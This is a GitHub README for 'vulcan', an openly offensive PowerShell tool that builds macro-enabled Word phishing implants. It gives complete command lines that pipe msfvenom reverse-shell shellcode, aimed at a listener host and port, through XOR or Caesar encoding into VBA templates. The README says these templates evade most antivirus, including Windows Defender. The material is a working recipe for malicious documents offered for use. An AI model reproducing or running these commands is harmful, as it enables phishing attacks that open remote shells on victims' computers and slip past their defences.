Skip to content
/ vulcan Public

A PowerShell script that simplifies life and therefore... phishing.

License

Notifications You must be signed in to change notification settings

aress31/vulcan

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

53 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

vulcan

Language License

A PowerShell script that simplifies life and therefore... phishing. 🎣

A PowerShell script to automate the creation of consitent and efficient macro-enabled Word documents. At the time of writing, the indirect template yields great results at evading most AVs, including Windows Defender in some cases.

This PowerShell script can be viewed as kind of a third-party add-on to MSFVenom - made possible thanks to Windows Subsystem for Linux - that leverage templates to quickly and easily - encoded - create Word implants.

Users/stargazers are greatly encouraged toward contributing to improving and extending this project. 🐺

⚠️ Do not be a dummy... NEVER submit any implant to VirusTotal. 🤢

Features

  • Decoding routines/functions (.\assets\decoders) -> do not hesitate to submit new templates.
  • Piping of shellcodes allowing for complex transformations in order to evade AVs.
  • Visual Basic templating (.\assets\templates) -> do not hesitate to submit new templates.
  • Work-around Visual Basic line-continuation limitations using -Treshold.

Requirements

Installation

  1. Clone this repository:

    git clone https://github.com/aress31/vulcan
    cd vulcan
  2. Load the PowerShell scripts:

    Import-Module -Name .\Vulcan.psm1
  3. (Optional) List available commands:

    Get-Module -Name vulcan | select -ExpandProperty ExportedFunctions
  4. Run vulcan:

    wsl --exec msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
        Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"

Although obvious, windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread is a placeholder in the above example... 🙄

Usage

Get-Help -Name Invoke-Vulcan is your friend... Your best friend is Get-Help -Name Invoke-Vulcan -Detailed. Nonetheless, Invoke-Vulcan must be fed a hex-formatted shellcode. This can be achieved with:

Get-Content -Path $ShellCode | Invoke-Vulcan ...
wsl --exec msfvenom ... -f hex | Invoke-Vulcan ...

Examples

  • Embed a plain shellcode:

    wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
        Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
  • Embed a Caesar-encoded shellcode:

    wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
        Invoke-Caesar -Key 5 | `
        Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder Caesar -DecoderPath ".\assets\decoders\caesar.vba" -Key 5 -Verbose
  • Embed a XOR-encoded shellcode:

    wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
        Invoke-XOR -Key "StarWatchThisRepo" | `
        Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder XOR -DecoderPath ".\assets\decoders\xor.vba" -Key "StarWatchThisRepo" -Verbose
    pwsh.in.vulcan.2022-07-31.04-20-56.mp4

    [!WARNING] The length of the key must be shorted than the shellcode.

Although obvious, windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread is a placeholder in the above examples... 🙄

Sponsor 💓

If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as a lot of my personal time went into creating this project. 😪

It is easy, all you got to do is press the Sponsor button at the top of this page or alternatively click this link. 😁

Reporting Issues

Found a bug 🐛? I would love to squash it!

Please report all issues on the GitHub issues tracker.

Contributing

You would like to contribute to better this project? 🤩

Please submit all PRs on the GitHub pull requests tracker.

Acknowledgements

Give to Caesar (no pun intended 🙄) what belongs to Caesar:

License

vulcan is distributed under the terms of the BSD 3.

See LICENSE for details.